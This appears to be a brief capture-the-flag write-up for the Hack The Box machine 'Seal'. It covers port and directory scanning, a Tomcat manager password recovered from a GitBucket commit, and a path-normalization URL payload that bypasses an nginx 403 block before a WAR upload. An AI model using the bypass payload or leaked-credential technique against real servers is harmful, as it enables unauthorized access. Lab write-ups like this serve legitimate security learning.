Seal

Recon & Enum

port scan

PORT     STATE SERVICE
22/tcp   open  ssh
443/tcp  open  https
8080/tcp open  http-proxy

directory scan

https://seal.htb/admin
https://seal.htb/images
https://seal.htb/css
https://seal.htb/js
https://seal.htb/manager
https://seal.htb/icon

https://seal.htb

a static website is running on , not worth it

http://seal.htb:8080

gitbucket is running on , got a login page and a signup functionality i found a tomcat-user.xml file in commit which gives me credentials of manager page

<?xml version="1.0" encoding="UTF-8"?>
		<!--
		  Licensed to the Apache Software Foundation (ASF) under one or more
		  contributor license agreements.  See the NOTICE file distributed with
		  this work for additional information regarding copyright ownership.
		  The ASF licenses this file to You under the Apache License, Version 2.0
		  (the "License"); you may not use this file except in compliance with
		  the License.  You may obtain a copy of the License at
		 
		      http://www.apache.org/licenses/LICENSE-2.0
		 
		  Unless required by applicable law or agreed to in writing, software
		  distributed under the License is distributed on an "AS IS" BASIS,
		  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
		  See the License for the specific language governing permissions and
		  limitations under the License.
		-->
		<tomcat-users xmlns="http://tomcat.apache.org/xml"
		              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
		              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
		              version="1.0">
		<!--
		  NOTE:  By default, no user is included in the "manager-gui" role required
		  to operate the "/manager/html" web application.  If you wish to use this app,
		  you must define such a user - the username and password are arbitrary. It is
		  strongly recommended that you do NOT use one of the users in the commented out
		  section below since they are intended for use with the examples web
		  application.
		-->
		<!--
		  NOTE:  The sample user and role entries below are intended for use with the
		  examples web application. They are wrapped in a comment and thus are ignored
		  when reading this file. If you wish to configure these users for use with the
		  examples web application, do not forget to remove the <!.. ..> that surrounds
		  them. You will also need to set the passwords to something appropriate.
		-->
		<!--
		  <role rolename="tomcat"/>
		  <role rolename="role1"/>
		  <user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
		  <user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
		  <user username="role1" password="<must-be-changed>" roles="role1"/>
		-->
		<user username="tomcat" password="42MrHBf*z8{Z%" roles="manager-gui,admin-gui"/>
		</tomcat-users>

we got credentials :- <user username="tomcat" password="42MrHBf*z8{Z%" roles="manager-gui,admin-gui"/>

shell as tomcat

https://seal.htb/manager

when i try to access the page it gave me 403 forbidden from ngnix and from tomcat , by this i searched google and i found this

https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf

payload =    http://seal.htb:8080/manager/name=xyz;/html

this will bypass the 403 forbideen error by ngnix

after getting in , i got upload functionality on apache tomcat through which i can upload WAR file